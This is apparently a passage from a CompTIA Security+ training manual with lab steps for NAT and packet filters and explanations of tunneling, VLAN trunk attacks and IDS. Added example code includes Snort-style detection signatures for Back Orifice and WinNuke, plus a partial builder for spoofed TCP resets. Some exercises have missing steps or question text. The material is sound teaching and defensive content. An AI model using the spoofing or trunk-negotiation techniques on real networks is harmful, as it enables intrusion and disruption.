15 Click Next.
16 Click Finish.
17 In Routing and Remote Access, expand Server-X.
18 Expand IP Routing.
19 Select General.
20 Right-click the Internal interface and choose Properties.
21 Activate the Configuration tab.
22 Select Use the following IP address, then enter the IP address and subnet mask assigned to the Internal interface. (This sets static IP addressing on the Internal interface.)
23 Click OK to save the changes.
24 Click OK to acknowledge the warning message.
25 Close and reopen Routing and Remote Access. (To reopen the MMC console, click Start, then choose Administrative Tools, Routing and Remote Access.)
Under IP Routing, if there are multiple instances of Internal, for this step it doesn't matter which instance you choose.
Click OK.
29 Right-click the External interface and choose Properties.
30 Verify that Public interface connected to the Internet is selected.
Do it! B-3:

Setup: Each pair requires a Windows Server 2003 server running RRAS with NAT (Server-X), a second Windows Server 2003 server to act as a client (Server-Y), Internet access on Server-X, and a crossover cable. Assist students with connecting the crossover cable.

Here's how
1 On Server-Y, disconnect the cable to the classroom network.
2 Connect a crossover cable from Server-Y to Server-X.
3 Log on to Server-Y as Administrator.
4 Choose Open. (This opens Network Connections.)
5 Right-click the network interface and choose Properties.
6 Double-click Internet Protocol (TCP/IP).
7 Enter the IP address assigned to Server-Y. (Do not press Enter.)
8 Enter the subnet mask, and enter the Internal address of Server-X as the default gateway.
9 Enter the preferred DNS server.
10 Open Internet Explorer.
11 Navigate to your favorite Web site. (Server-Y reaches the Internet through NAT on Server-X.)
12 Close Internet Explorer.
Do it! B-4:

Setup: Students should have a Windows Server 2003 server running RRAS and NAT (Server-X) and a second Windows Server 2003 server to act as a client (Server-Y).

Here's how
1 On Server-X, open Routing and Remote Access, if necessary.
2 Expand IP Routing and select General.
3 Right-click the External interface and choose Properties. (This opens the External Properties dialog box; the General tab is activated by default.)
4 Click Outbound Filters, then click New. (This opens the Outbound Filters dialog box and then the Add IP Filter dialog box.)
5 Enter the filter information for the HTTP protocol (TCP port 80).
6 Click OK to return to the Outbound Filters dialog box. The settings you just entered instruct the router to block all Internet access using the HTTP protocol.
7 Verify that the option to transmit all packets except those that meet the filter criteria is selected, then click OK twice.
8 On Server-Y, launch Internet Explorer and try to access your favorite Web site. Internet Explorer will try to load the page. After a few minutes, you'll receive the error message: The page cannot be displayed.
9 Close Internet Explorer.
Do it! B-5:

Here's how
1 On Server-X, right-click the Internal interface and choose Properties.
2 Click Inbound Filters, then click New.
3 Enter the filter information for FTP. (The filter blocks local FTP traffic while still allowing FTP access to the Internet.)
6 On Server-Y, click Start, choose Run, and enter cmd.
7 At the command line, enter ftp 10.10.10.1 to connect to Server-X via FTP. You'll be notified that you are connected to Server-X, but the connection will time out, and you'll receive the message: Connection closed by remote host.
9 Press Ctrl+C, then enter quit.
10 On Server-X, right-click the External interface and choose Properties.
11 Click Outbound Filters.
12 Click Delete, then click OK to close the Outbound Filters window and OK to close the External Properties window.
13 Right-click the Internal interface and choose Properties. (This starts the removal of the NAT inbound filters.)
14 Click Inbound Filters.
15 Click Delete, then click OK to close the Inbound Filters window and OK to close the Internal Properties window.
16 Click Yes.
17 Remove the crossover cable from Server-Y.
18 Reconnect the network cable for Server-Y to the classroom network.
19 On Server-Y, access the properties of the network interface and select Obtain an IP address automatically.
Topic C: Tunneling
This topic covers the following CompTIA Security+ exam objective:
3.3 Understand the concepts behind the following kinds of security topologies: Tunneling
Exhibit 11-3: Tunneling across a shared infrastructure

To solve the problem, a router with Internet Protocol Security (IPSec) encryption capabilities is deployed as a gateway on each LAN's Internet connection. The routers are configured for a point-to-point VPN tunnel, which uses encryption to build a virtual connection between the two routers. When a router sees traffic on its LAN that is destined for the other office, it communicates over the Internet with the router on the other side, instructing it to build the tunnel. The tunnel is really a negotiated security association: an agreement between the two routers on the algorithms and keys used to encrypt and authenticate the data. Once the two routers have negotiated a secure encrypted connection, traffic from the originating host is encrypted using the agreed-upon settings and sent to the peer router. The peer router decrypts the data and forwards it to the appropriate host on its LAN.

The connection appears to be a tunnel because the hosts on the two LANs are unaware that their data is being encrypted. The encryption and delivery of the data over the untrusted network happen transparently to the communicating hosts. Because of their low cost (VPN tunnels often use existing Internet connections) and security, tunnels have become common, replacing wide area network (WAN) links such as frame relay connections. Tunneling is an option for most IP connectivity requirements.
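The gateway-to-gateway exchange described above, as an added example in Python that is not part of the manual: each gateway wraps a whole inner LAN packet (tunnel mode) in an outer packet addressed from its own public address to the peer's, protects it with a key the two are assumed to have already negotiated, and the peer verifies, decrypts and delivers only packets destined for its own LAN. The "cipher" is an HMAC-SHA256 keystream with an HMAC tag, used only to keep the example dependency-free; a real gateway uses IPsec ESP. Addresses and the session key are assumed values.

```python
"""Site-to-site tunnel-mode encapsulation between two VPN gateways.

Added example (not from the manual). Two gateways share a negotiated key and
wrap each inner LAN packet in a new outer packet addressed gateway-to-gateway.
Encryption here is an HMAC-SHA256 keystream plus an HMAC tag, chosen only to
illustrate the encapsulation; a real gateway uses IPsec ESP.
"""
import hmac
import hashlib
import struct
import ipaddress

LAN_A = ipaddress.ip_network("10.1.0.0/16")   # assumed: office A's LAN
LAN_B = ipaddress.ip_network("10.2.0.0/16")   # assumed: office B's LAN

def keystream(key, seq, n):
    """Deterministic keystream for packet number `seq` (illustrative, not a real cipher)."""
    out = b""
    for block in range((n + 31) // 32):
        out += hmac.new(key, struct.pack("!QI", seq, block), hashlib.sha256).digest()
    return out[:n]

def xor(data, ks):
    return bytes(a ^ b for a, b in zip(data, ks))

class Gateway:
    def __init__(self, public_ip, lan, peer_ip, peer_lan, key):
        self.public_ip, self.lan = public_ip, lan
        self.peer_ip, self.peer_lan = peer_ip, peer_lan
        self.key = key          # assumed result of the gateways' negotiation
        self.seq = 0
        self.seen = set()       # anti-replay (simplified: remembers every sequence number)

    def encapsulate(self, inner):
        """Tunnel mode: the whole inner IP packet becomes the protected payload."""
        inner_dst = ipaddress.ip_address(inner["dst"])
        if inner_dst not in self.peer_lan:
            return None         # not for the other site: routed normally, in the clear
        plain = struct.pack("!4s4sH", ipaddress.ip_address(inner["src"]).packed,
                            inner_dst.packed, len(inner["data"])) + inner["data"]
        self.seq += 1
        ct = xor(plain, keystream(self.key, self.seq, len(plain)))
        tag = hmac.new(self.key, struct.pack("!Q", self.seq) + ct, hashlib.sha256).digest()[:16]
        # Outer header carries only the two gateways' public addresses.
        return {"src": self.public_ip, "dst": self.peer_ip, "seq": self.seq, "ct": ct, "tag": tag}

    def decapsulate(self, outer):
        """Verify, decrypt and recover the inner packet for delivery on the local LAN."""
        if outer["dst"] != self.public_ip or outer["src"] != self.peer_ip:
            return None
        expect = hmac.new(self.key, struct.pack("!Q", outer["seq"]) + outer["ct"],
                          hashlib.sha256).digest()[:16]
        if not hmac.compare_digest(expect, outer["tag"]):
            return None         # tampered in transit or wrong key: dropped silently
        if outer["seq"] in self.seen:
            return None         # replayed packet
        self.seen.add(outer["seq"])
        plain = xor(outer["ct"], keystream(self.key, outer["seq"], len(outer["ct"])))
        if len(plain) < 10:
            return None
        src, dst, n = struct.unpack("!4s4sH", plain[:10])
        inner = {"src": str(ipaddress.ip_address(src)),
                 "dst": str(ipaddress.ip_address(dst)), "data": plain[10:10 + n]}
        if ipaddress.ip_address(inner["dst"]) not in self.lan:
            return None         # the peer may only inject traffic destined for our LAN
        return inner

def make_pair(key=b"assumed-negotiated-session-key"):
    """Two gateways configured for each other (constructed addresses)."""
    a = Gateway("198.51.100.1", LAN_A, "203.0.113.1", LAN_B, key)
    b = Gateway("203.0.113.1", LAN_B, "198.51.100.1", LAN_A, key)
    return a, b

if __name__ == "__main__":
    a, b = make_pair()
    outer = a.encapsulate({"src": "10.1.0.5", "dst": "10.2.0.9", "data": b"hello"})
    print("on the wire:", outer["src"], "->", outer["dst"], "seq", outer["seq"], "bytes", len(outer["ct"]))
    print("delivered:  ", b.decapsulate(outer))
```

The inner 10.1.x/10.2.x addresses never appear on the Internet leg, only the gateways' public addresses do, which is why the hosts on each LAN need no configuration and why the connection looks like a tunnel to them.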
Do it! C-1:

2 For each of the descriptions below, indicate whether the VPN is a remote access or site-to-site topology.
- Creates a secured connection between a remote client and an access point or the corporate network: Remote access
- Establishes a point-to-point connection
- Requires an ISP to establish the tunnel
- Uses tunnel mode encryption
- Decrypts the entire IP packet before forwarding to the destination host
VLANs
Explanation Virtual local area networks (VLANs) divide a single physical network switch into multiple logical network segments or broadcast domains. The ability to configure multiple VLANs on a single switch is a very powerful and useful technology that offers network flexibility, scalability, increased performance, and some security features. VLANs are often coupled with a complementary technology, called a trunk, which allows switches to carry many VLANs over a single physical link. Because VLANs make it easy to segment a network into multiple subnets (which cannot communicate with each other at Layer 2), they increase the need for routers, which route between subnets and are also where packet-filtering controls between VLANs are applied. Because of their benefits, VLANs (and by association, trunking) have become extremely widespread. Most enterprise-grade network switches come standard with the ability to define VLANs. However, VLANs do suffer from a number of vulnerabilities, which can be mitigated by following best practices in network design.
How it works
As an example of how VLANs work, we'll use a Cisco Catalyst 6509 switch belonging to a business with five departments and 220 employees. This type of switch is an enterprise-class switch that can support a line card with 48 Ethernet ports in up to eight of its nine slots. That's a total of 384 Ethernet ports on a single switch! By configuring several VLANs on the switch, and assigning each port to an appropriate VLAN, the single physical switch is broken up into multiple logical switches. The business in our example can configure a separate VLAN for each department. It doesn't matter to which port a given user's computer is connected, because the switch can be configured to place the port into any VLAN.

Exhibit 11-4: Physical VLAN configuration on a Cisco Catalyst 6509

Because the connection between each switch is a trunk, packets from any VLAN can pass across it. (The normal VLAN boundaries still apply: hosts on different VLANs cannot communicate with each other over trunks.) This enables hosts connected to VLAN 20 on the fourth floor to communicate with hosts on the sixth floor who are also connected to VLAN 20. Without trunking, a separate physical connection for each VLAN would have to be established between each switch and switch E. The switch watches packets arriving on a trunk port, determines from the tag to which VLAN each belongs, and forwards it to the appropriate port. The result is that the network administrator can place any host in the building on any of the network's subnets, on the fly, without any physical recabling. Major trunking protocols include IEEE 802.1q and Cisco's proprietary Inter-Switch Link (ISL).
One way that trunks can be abused stems from the fact that the default behavior of some manufacturers' switches is to automatically negotiate a trunk connection if the connecting device initiates it. Attackers can exploit this behavior by compromising a host on the network and then having that host negotiate a trunk connection with the switch. Once the trunk is established, the switch forwards traffic for all VLANs across the link, giving the attacker access to potentially the entire network. Recall our example in which the Accounting and Marketing Departments are placed on separate VLANs and are connected with a router that filters traffic between the two. The attacker could use a host in the Marketing Department to create a trunk with the switch. As the switch begins to forward traffic down the illicit trunk link, the attacker can view and possibly modify traffic from Marketing, Accounting, or any other department using the switch. The protection provided by packet filtering on the router has been completely bypassed, because the trunk traffic does not pass through the router.

Prevent illicit trunk connections by disabling trunk auto-negotiation on all ports. Ports that are to carry trunks should be explicitly configured as trunks. All other ports should be explicitly configured not to be trunks.

Trunk VLAN membership and pruning

By default, trunk links are permitted to carry traffic from all VLANs on the network. This can degrade switch performance, because large amounts of traffic are carried across trunks. In some cases, this traffic might not even be needed, as when a switch receives traffic for the Accounting VLAN over a trunk but has no ports configured for that VLAN. This situation can be relieved by pruning (that is, removing) unneeded VLANs from the trunk. By removing the Accounting VLAN from the trunk, more bandwidth is made available to users connected to the switch.

Some switches simplify this process by automatically pruning VLANs from a trunk if there are no member ports for those VLANs on the other side of the trunk link. Relying on this default behavior to ensure that sensitive information is not carried to undesired areas of the network is dangerous, however. For example, take a switch in a company's mechanic shop that is only used by the shop employees and has a trunk connection back to the office network. By default, only traffic destined for the auto shop is forwarded across the trunk, because there are no ports on the shop's switch that are configured for other VLANs. However, the Accounting Department's information is still at risk. If an attacker could configure a port on the shop's switch to be in the Accounting VLAN, then the Accounting VLAN would no longer be pruned from the trunk, and Accounting traffic would automatically be forwarded across the trunk to the mechanic shop. An attacker could take advantage of a poorly monitored area to physically compromise the network. To prevent such attacks, all trunk links should be manually configured with the VLANs that are permitted to traverse them. Manual trunk pruning cannot be overridden the way automatic pruning is preempted.

For more information on VLANs, go to:
http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/lanswtch.htm
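The access-port and trunk settings recommended above, as an added configuration example in Cisco IOS syntax that is not from the manual or from Cisco's documentation. Interface names, VLAN numbers and the "parking" VLAN 999 are assumed; `switchport trunk encapsulation dot1q` is only needed on platforms that also support ISL. The first interface shows the weak default the text warns about; the rest show the hardened form.

```cisco
! WEAK: the port becomes a trunk as soon as the attached device sends DTP
! negotiation frames, which a compromised host can do.
interface FastEthernet0/10
 switchport mode dynamic desirable

! HARDENED access port: fixed access mode, DTP negotiation off, one data VLAN.
! A host on this port cannot negotiate a trunk and sees only VLAN 20 traffic.
interface FastEthernet0/10
 description Marketing workstation
 switchport mode access
 switchport access vlan 20
 switchport nonegotiate
 spanning-tree portfast

! Deliberate trunk (uplink to switch E): explicitly a trunk, DTP off, and the
! allowed list limited by hand to the VLANs this switch needs. Manual pruning
! is not undone by someone later adding a port to another VLAN, unlike
! automatic pruning.
interface GigabitEthernet0/1
 description Uplink to switch E
 switchport trunk encapsulation dot1q
 switchport mode trunk
 switchport nonegotiate
 switchport trunk allowed vlan 20,30
 switchport trunk native vlan 999

! Unused ports: access mode in an unused VLAN, and shut down until needed.
interface range FastEthernet0/20 - 24
 switchport mode access
 switchport access vlan 999
 switchport nonegotiate
 shutdown
```

After applying the configuration, `show interfaces trunk` should list only the intended uplink with its restricted VLAN list, and `show interfaces FastEthernet0/10 switchport` should report the administrative mode as static access with negotiation of trunking off; any other port appearing as a trunk is a finding.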
Do it! D-1:

1 Options:
A IEEE 802.1q
B IEEE 802.3
C Cisco's proprietary Inter-Switch Link (ISL)
D IEEE 802.10

2 VLANs are often coupled with a complementary technology, called _________, which allows switches to share many VLANs over a single physical link.
a trunk

3 When referring to VLANs, pruning refers to removing unneeded VLANs from the trunk. True or false?
True

4 VLANs are used throughout networks to segment, or separate, different hosts from each other on the network. True or false?
True
Review questions

1 Which security zone should contain your Web, FTP, and mail servers?
A Intranet
B DMZ
C Extranet
D VPN
Answer: B, DMZ

2 Which security zone describes a configuration where the internal network of one company is available to another for B2B transactions?
Extranet

3 Which network service(s) allows internal addresses to be hidden from outside networks?
A NAT
B DMZ
C VLAN
D VPN
Answer: A, NAT

4 PAT allows many hosts to share a single IP address by combining the IP address with a unique ________________.
TCP/UDP port number

5 Options:
C Extranet
D Perimeter network
Answer: Tunneling

6 Which of the following ports are necessary for allowing DNS traffic?
A TCP 53
B TCP 80
C UDP 53
D UDP 80
Answer: A and C (DNS uses UDP 53 for ordinary queries and TCP 53 for zone transfers and responses too large for a UDP datagram)

7 What are the benefits of a VLAN?
A It hides the internal IP address from external networks.
C It provides a secure tunnel between two extranets.
D It filters incoming traffic for selected IP and port addresses.

8 What are vulnerabilities of the VLAN?
A A compromised host can negotiate a trunk connection with the switch, giving the attacker access to the entire network.
B A host's broadcasts can be seen by other network segments.
C A sniffer can be physically inserted into a specific targeted network segment.
D Automatic pruning permits an attacker to reconfigure a switch's port to forward traffic to a different segment.
Answer: A and D
Intrusion detection
Because an IDS can be either correct or incorrect in its determination about the type of activity, there are four possibilities to describe the correctness of IDS determinations:
- True positives occur when the IDS correctly identifies undesirable traffic.
- True negatives occur when the IDS correctly identifies normal traffic.
- False positives occur when the IDS incorrectly identifies normal traffic as an attack.
- False negatives occur when the IDS incorrectly identifies an attack as normal traffic.

False negatives

A false negative means that the IDS failed to detect an attack, a very undesirable situation. False negatives typically occur when the pattern of traffic is not in the signature database, as with a new attack. False negatives can also occur with network-based IDS when the sensor is not able to analyze passing traffic fast enough. For example, if a network-based IDS (NIDS) capable of processing 40 Mb/sec of traffic is placed on a 100 Mb/sec network segment, the NIDS will begin to miss packets whenever the volume of traffic on the segment exceeds its 40 Mb/sec capacity. IDS is not infallible, and false negatives do occur on a regular basis. The problem of false negatives can be dealt with in two ways. First, a combination of network-based and host-based IDS can be used to obtain more even coverage. The combination also helps to gather more data on attacks, which helps administrators analyze an attack more effectively. Second, NIDS can be deployed at multiple strategic locations in the network. That way, an attack missed by one NIDS, on the server farm's network segment, for example, might be caught by the NIDS just inside the firewall.

False positives

False positives happen when the IDS mistakenly reports benign activity as malicious. Best-case false positives require human intervention to diagnose the event. Worst-case false positives cause legitimate traffic to be blocked by a router or firewall.

Obviously, false positives are undesirable because they require the time of a security administrator, an expensive commodity, to analyze and sort out the problem. All IDS products on the market today are subject to false positives. Especially just after deployment, an IDS can be expected to produce a relatively high volume of false positives, which are reduced over time by a process called tuning. Tuning allows the administrator to instruct sensors not to alarm based on parameters such as signature type and source or destination IP address. One common example is a network management program that pings devices to ensure that they are functioning. This behavior resembles a reconnaissance technique called a ping sweep, which attackers use to determine which IP addresses are up and available to attack, and it triggers an alarm from a NIDS. Although ping sweeps can indicate malicious activity, the alarm is a false positive when the sweep is conducted by an authorized host, the network management system. To prevent the NIDS sensor from raising this false positive, it can be configured not to alarm on ping sweeps from the network management system's IP address. Tuning is an essential step in any IDS deployment.
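The ping-sweep tuning case above, worked through as an added example in Python that is not part of the manual: a sweep signature fires when one source sends ICMP echo requests to many distinct hosts within a short window, and the result is scored into the four outcome classes before and after the network management host is suppressed for that signature. The ICMP records are constructed, the management host's address and the thresholds are assumed, and the ground-truth labels exist only so the outcomes can be counted.

```python
"""Ping-sweep detection with tuning, scored as true/false positives and negatives.

Added example (not from the manual). Records, the management-host address,
the thresholds and the ground-truth labels are all constructed for the example.
"""
from collections import defaultdict

SWEEP_THRESHOLD = 8     # distinct destinations within the window counts as a sweep (assumed)
WINDOW_SECONDS = 60

# Constructed ICMP echo-request records: (time in seconds, source, destination).
EVENTS = (
    [(t, "10.0.0.5", f"10.0.1.{i}") for t, i in zip(range(0, 40, 2), range(1, 21))]            # NMS polling 20 hosts
    + [(100 + t, "192.0.2.66", f"10.0.1.{i}") for t, i in zip(range(0, 30), range(1, 31))]     # attacker sweeping 30 hosts
    + [(200, "10.0.0.50", "10.0.1.7"), (205, "10.0.0.50", "10.0.1.8")]                        # a user pinging two hosts
)
# Ground truth, used only for scoring: which sources actually ran hostile sweeps.
HOSTILE_SOURCES = {"192.0.2.66"}
NMS_ADDRESS = "10.0.0.5"   # assumed address of the network management system

def detect_sweeps(events, suppress_sources=frozenset()):
    """Return the set of sources that trigger the ping-sweep signature.

    `suppress_sources` is the tuning knob: sources for which this signature
    never alarms, regardless of how many hosts they ping.
    """
    by_src = defaultdict(list)
    for t, src, dst in events:
        by_src[src].append((t, dst))
    alerted = set()
    for src, hits in by_src.items():
        if src in suppress_sources:
            continue
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            distinct = {d for t, d in hits[i:] if t - t0 <= WINDOW_SECONDS}
            if len(distinct) >= SWEEP_THRESHOLD:
                alerted.add(src)
                break
    return alerted

def score(events, alerted, hostile):
    """Count the four outcome classes over every source seen in the events."""
    sources = {src for _, src, _ in events}
    return {
        "tp": len(alerted & hostile),            # correctly flagged hostile sources
        "fp": len(alerted - hostile),            # benign sources flagged (analyst time wasted)
        "fn": len(hostile - alerted),            # hostile sources missed
        "tn": len(sources - alerted - hostile),  # benign sources correctly left alone
    }

def before_and_after_tuning(events=EVENTS, hostile=HOSTILE_SOURCES, nms=NMS_ADDRESS):
    """Score the untuned sensor and then the sensor with the NMS suppressed."""
    untuned = score(events, detect_sweeps(events), hostile)
    tuned = score(events, detect_sweeps(events, suppress_sources={nms}), hostile)
    return untuned, tuned

if __name__ == "__main__":
    untuned, tuned = before_and_after_tuning()
    print("untuned:", untuned)
    print("tuned:  ", tuned)
```

The suppression is scoped to one signature and one source address, which is the point of tuning: the attacker's sweep still alarms, and the management host would still alarm on any other signature.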
Do it! A-1: Detecting intrusion

2 Intrusion detection provides monitoring of network resources to detect intrusions and attacks that were not stopped by the preventative techniques. True or false?
True

3 Intrusion detection systems identify attacks by comparing traffic to signature files with known types of attack and detecting anomalies. True or false?
True

4 False negatives happen when the IDS mistakenly reports certain benign activity as malicious. True or false?
False. These are false positives.

Options:
A Combine network-based and host-based IDS.
B Tune the IDS to accept specific signature types or source or destination IP addresses.
C Deploy NIDS at multiple strategic locations in the network.
D Reduce the traffic speed.
Types of IDS
Explanation The two types of intrusion detection systems on the market today are host-based and network-based. The essential difference between them is the scope of activity that they monitor and analyze to detect intrusions. Network-based IDS (NIDS) monitor network traffic while host-based IDS (HIDS) monitor activity on a particular host machine.
Network-based IDS
NIDS sensors are dedicated network devices or servers that monitor traffic on one or more network segments. A sensor usually has two network connections: one that operates in promiscuous mode to sniff passing traffic, and an administrative NIC that is used to send data such as alerts to a centralized management system. The configuration is shown in Exhibit 12-1.

Exhibit 12-1: NIDS monitoring and management interfaces

Because NIDS analyze all passing traffic, they can be used to protect an entire network segment, or the entire organization, depending on their placement within the network. The primary constraint for NIDS is the occasional inability to keep up with the pace of network traffic.
CompTIA Security+ Certification NIDS architecture One of the key questions that arise in deploying NIDS is, where in the network do sensors belong? Because it is not cost-effective or even manageable to deploy sensors on all network segments, careful consideration needs to be given as to where they are deployed. To determine how to deploy IDS, one needs only answer the question: What do I most need to protect? The decision of where to deploy IDS should be driven by the value your organization places on its information assets. This is because NIDS sensors are placed strategically in the network to defend assets that are considered the most valuable where they will offer the most protection. Typical locations for IDS sensors include: Just inside the firewall On the DMZ On any subnets containing mission-critical servers Just inside the firewall is a common location for IDS because it is the bottleneck through which all inbound and outbound traffic must pass. In this location, sensors are able to inspect every packet coming into or out of the organizations network, provided there are no other avenues such as dial-up connections or extranet connections that the attacker can use. The DMZ is another good location for IDS, because the publicly reachable hosts located there are frequently attacked from the Internet. If a good security policy is implemented (which likely disallows connectivity from the Internet directly to the inside network), then the DMZ is the attackers first point of entry into the network. Once a DMZ host has been compromised, the attacker attempts to penetrate the trusted network. IDS in this location can help to identify and stop intruders before they are able to do so. Finally, consider placing the sensor on any subnets containing mission-critical application servers, such as those performing financial, logistical, and human resources functions. 
By placing the sensor on these segments, the organization can defend its servers from attacks originating from inside the network.

NIDS signature types

Signature-based IDS look for patterns in packet payloads that indicate a possible attack. When the sensor finds a packet payload that matches a string pattern in its signature database, it identifies the packet as an attack and alerts the administrator.

An IDS based on another signature type, the port signature, simply watches for connection attempts to a known or frequently attacked port. These could be ports used by Trojan horse programs or other malware, or they could simply be well-known ports in a packet destined for a part of the network where the corresponding service should not exist. For example, if telnet (TCP port 23) is not used on the DMZ, then a telnet packet destined for the DMZ can be marked as suspicious.

Finally, IDS based on header signatures watch for dangerous or illogical combinations in packet headers. One well-known example is a packet generated by the attack tool WinNuke. WinNuke creates packets destined for a NetBIOS port with the TCP Urgent (URG) flag set, that is, carrying out-of-band data. This packet crashes older Windows systems. A NIDS based on header signatures identifies this type of packet as an attack because the attack is contained in the packet's header, not in its payload.
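The three signature types above, written as Snort-style rules and run over a handful of hand-built packets. This is an added illustration written for this page, not Snort itself and not a real signature: the Back Orifice byte pattern, the 192.168.2.0/24 DMZ range, and the packets are all constructed, and the rule parser supports only the small subset of Snort syntax (msg, content, flags, sid) that the example needs.

```python
"""Minimal signature-based NIDS engine (added illustration, not Snort itself).

Three signature types are expressed in a Snort-like rule syntax:
  content signature - a byte pattern in the payload (the Back Orifice rule)
  port signature    - a connection attempt to a port where no service should be
                      reachable (telnet into the DMZ)
  header signature  - an illogical header combination (URG flag to a NetBIOS port,
                      the WinNuke shape)
The byte pattern, addresses and packets are constructed; none is a real signature.
"""
import ipaddress
import re
from dataclasses import dataclass, field

@dataclass
class Packet:
    """Just the fields a signature inspects; built by hand, not parsed from a capture."""
    proto: str            # "tcp", "udp" or "icmp"
    src: str
    sport: int
    dst: str
    dport: int
    flags: str = ""       # TCP flag letters, e.g. "S", "PA", "PAU"
    payload: bytes = b""

@dataclass
class Rule:
    action: str
    proto: str
    dst: str              # "any" or a CIDR such as 192.168.2.0/24
    dport: str            # "any" or a port number
    options: dict = field(default_factory=dict)

RULE_RE = re.compile(
    r"^(?P<action>alert|log)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+->\s+"
    r"(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)\s*$")

def parse_rule(line):
    """Parse one rule in the subset of Snort syntax used here (msg, content, flags, sid)."""
    m = RULE_RE.match(line.strip())
    if not m:
        raise ValueError("unparseable rule: " + line)
    options = {}
    for opt in m.group("opts").split(";"):
        if opt.strip():
            key, _, val = opt.partition(":")
            options[key.strip()] = val.strip().strip('"')
    return Rule(m.group("action"), m.group("proto"), m.group("dst"), m.group("dport"), options)

def content_bytes(spec):
    """Snort content syntax: literal text, with |..| sections giving hex bytes."""
    out = b""
    for i, part in enumerate(spec.split("|")):
        out += bytes.fromhex(part) if i % 2 else part.encode()
    return out

def matches(rule, pkt):
    """Every clause of the rule must hold; a rule with no content/flags is a pure port signature."""
    if rule.proto not in ("ip", pkt.proto):
        return False
    if rule.dst != "any" and ipaddress.ip_address(pkt.dst) not in ipaddress.ip_network(rule.dst):
        return False
    if rule.dport != "any" and int(rule.dport) != pkt.dport:
        return False
    if "content" in rule.options and content_bytes(rule.options["content"]) not in pkt.payload:
        return False
    if "flags" in rule.options and not set(rule.options["flags"]) <= set(pkt.flags):
        return False
    return True

def run_sensor(rules, packets):
    """Return (sid, msg) for every rule each packet matches, in packet order."""
    alerts = []
    for pkt in packets:
        for rule in rules:
            if matches(rule, pkt):
                alerts.append((int(rule.options.get("sid", 0)), rule.options.get("msg", "")))
    return alerts

RULES = [parse_rule(r) for r in (
    'alert udp any any -> any 31337 (msg:"Back Orifice probe"; content:"|CE 63 D1 D2 16 E7 13 CF|"; sid:100;)',
    'alert tcp any any -> 192.168.2.0/24 23 (msg:"Telnet to DMZ where no telnet service exists"; sid:101;)',
    'alert tcp any any -> any 139 (msg:"Urgent data to NetBIOS port (WinNuke shape)"; flags:U; sid:102;)',
)]

SAMPLE_PACKETS = [  # constructed traffic: three attacks, two benign packets
    Packet("udp", "203.0.113.9", 4321, "192.168.2.10", 31337, payload=bytes.fromhex("CE63D1D216E713CF") + b"\x00" * 8),
    Packet("tcp", "203.0.113.9", 4322, "192.168.2.10", 23, flags="S"),
    Packet("tcp", "203.0.113.9", 4323, "192.168.1.5", 139, flags="PAU", payload=b"oob"),
    Packet("tcp", "203.0.113.9", 4324, "192.168.1.5", 139, flags="PA", payload=b"ordinary session"),
    Packet("tcp", "10.0.0.7", 4325, "192.168.1.20", 23, flags="S"),   # telnet on the inside: allowed
]

if __name__ == "__main__":
    for sid, msg in run_sensor(RULES, SAMPLE_PACKETS):
        print("ALERT sid=%d %s" % (sid, msg))
```

The second and third sample packets to port 139 differ only in the URG flag, which is the whole point of a header signature: the payload is irrelevant. The last packet is a telnet SYN to a subnet outside the DMZ range, so the port signature stays quiet; that destination restriction is what keeps a port signature from firing on every telnet session in the enterprise.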
Intrusion detection
Because new vulnerabilities are constantly identified by the security community, signature-based intrusion detection systems must be kept up to date with the latest signatures, much as virus definitions in virus-scanning software need to be kept current. The time between when a new attack first becomes available and when it becomes known to the security community (which then produces a signature for it) is a vulnerability of signature-based IDS, because attackers are free to use the new exploit without fear of detection during that period. IDS vendors commonly provide signature update services and e-mail customers when new signatures become available. To minimize this window, it is critical that the IDS be loaded with the latest signatures.

Network IDS reactions

As previously noted, network-based IDS with active monitoring capabilities are able to react when they detect an attack in progress. Typical reaction types include:

- TCP resets
- IP session logging
- Shunning or blocking

Most active capabilities are configurable on a per-signature basis, meaning that the sensor can perform IP session logging for some attacks, blocking for others, or simply sound the alarm, depending on the organization's requirements.

Note: Extreme care should be used with active sensor capabilities to prevent interference with legitimate traffic. In practice, active capabilities are infrequently implemented because of the risk that they could be used to deny service to legitimate user traffic. When these capabilities are deployed, it is done after the sensors have been carefully tuned, and it requires ongoing monitoring.

TCP resets

TCP resets operate by sending a TCP reset packet (which terminates a TCP session) to the victim host, spoofing the IP address of the attacker. Resets are sent from the sensor's monitoring or sniffing interface, not from its management interface.
Although TCP resets can terminate an attack in progress, they cannot stop the initial packet from reaching the victim. In some cases, a single packet is all that is required to crash or compromise the victim host. Further, in order to successfully spoof the attacking host (remember that the victim does not know it is under attack and sees the TCP session as being like any other session that should be protected from hijacking), the sensor must use a correct TCP sequence number, taken from the packets it has observed, so that the victim accepts the reset and ends the session. A reset whose sequence number falls outside the victim's receive window is simply discarded, and on a busy session the numbers can move past what the sensor saw before its reset arrives.

IP session logging

With IP session logging, the sensor records traffic passing between the attacker and the victim. (These records can be very useful for analyzing the attack and preventing it in the future.) The limitation of logging is that only the triggering packet and subsequent packets are logged, so any preceding packets are lost. IP session logging can also impact sensor performance and quickly consume large amounts of disk space.
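What the sensor actually has to put on the wire, and why the sequence number decides whether the victim listens. This is an added example written for this page, not code from any IDS vendor: build_rst() assembles the raw IPv4 and TCP headers of a reset with the attacker's address spoofed as source and the observed ports and sequence number copied in, and accepts_reset() models the receiver's RFC 793 window check. The addresses, ports and sequence numbers are constructed.

```python
"""Added illustration of the sensor-generated TCP reset (not a vendor's code).

build_rst() assembles a raw IPv4 + TCP reset as a sensor would inject it from its
sniffing interface: source address = the attacker (spoofed), destination = the
victim, ports and sequence number copied from the observed session.
accepts_reset() models the check on the victim's side that makes the sequence
number matter: RFC 793 honours a RST only if its sequence number lies inside the
receive window.  Addresses and numbers are constructed for the example.
"""
import struct

def _checksum(data):
    """Internet checksum: one's-complement sum of 16-bit words (used by IPv4 and TCP)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def _ip_bytes(dotted):
    return bytes(int(octet) for octet in dotted.split("."))

def build_rst(spoofed_src, victim_dst, sport, dport, seq, ttl=64):
    """Return the 40-byte IPv4 header + TCP header of a RST, ready for a raw socket."""
    src, dst = _ip_bytes(spoofed_src), _ip_bytes(victim_dst)
    rst_flag, data_offset = 0x04, 5 << 4               # 20-byte TCP header, no options
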